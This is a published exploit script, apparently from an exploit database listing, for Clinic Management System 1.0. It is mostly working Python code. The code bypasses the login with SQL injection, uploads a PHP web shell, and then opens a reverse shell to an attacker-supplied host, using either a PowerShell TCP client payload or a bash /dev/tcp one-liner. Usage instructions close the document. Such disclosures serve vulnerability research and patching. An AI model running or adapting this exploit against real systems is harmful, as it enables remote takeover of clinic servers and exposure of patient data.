Exploit for Clinic Management System 1.0 Code Execution / SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:164593
# Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution  
# Date:21/10/2021  
# Exploit Author: Pablo Santiago  
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip  
# Version: 1.0  
# Tested on: Windows 7 and Ubuntu 21.10  
# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e  
  
# Vulnerability: Through SQL injection to bypass the login form it is  
possible to upload a malicious file and after use that malicious file to  
execute code in the remote system.  
# Proof of Concept:  
  
import requests  
import sys  
import time  
  
  
session = requests.Session()  
#http_proxy = "http://127.0.0.1:8080"  
#https_proxy = "https://127.0.0.1:8080"  
  
#proxyDict = {"http" : http_proxy,  
# "https" : https_proxy}  
  
def windows(HPW,host,shell_name):  
payload =  
"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""  
host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload  
#print(payload)  
try:  
request_rce = requests.get(host2,timeout=8)  
except requests.exceptions.ReadTimeout:  
pass  
  
  
def linux(HPL,host,shell_name):  
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"'  
host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload  
#print(payload)  
try:  
request_rce = requests.get(host2,timeout=8)  
except requests.exceptions.ReadTimeout:  
pass  
  
def main():  
  
host = sys.argv[1]  
shell_name = sys.argv[2]  
url = host + '/login.php'  
values = {'user': "admin",  
'email': "' OR 1 -- -",  
'password': '',  
'btn_login': ""  
}  
  
r = session.post(url, data=values)  
cookie = session.cookies.get_dict()['PHPSESSID']  
  
data = { 'btn_web':''}  
headers= {'Cookie': 'PHPSESSID='+cookie}  
  
  
  
request = session.post(host+ '/manage_website.php', data=data,  
headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_GET[cmd]`?>")})  
print("")  
print('[*] Your Simple Webshell was uploaded to ' + host +  
'/uploadImage/Logo/' + shell_name + '.php' )  
print("")  
LHOST = input('[+] Enter your LHOST: ')  
LPORT = input('[+] Enter your LPORT: ')  
print("")  
HPW= "'"+LHOST+"'"+','+LPORT  
HPL= ""+LHOST+""+'/'+LPORT  
  
print('[+] Option 1: Windows')  
print('[+] Option 2: Linux')  
  
option = input('[+] Choose OS: ')  
  
if option == "1":  
  
windows(HPW,host,shell_name)  
exit()  
  
elif option == "2":  
linux(HPL,host,shell_name)  
exit()  
  
else:  
print("Please choose Windows or Linux")  
  
main()  
  
#Usage: python3 host shell_name  
#Example: python3 http://localhost/clinic shell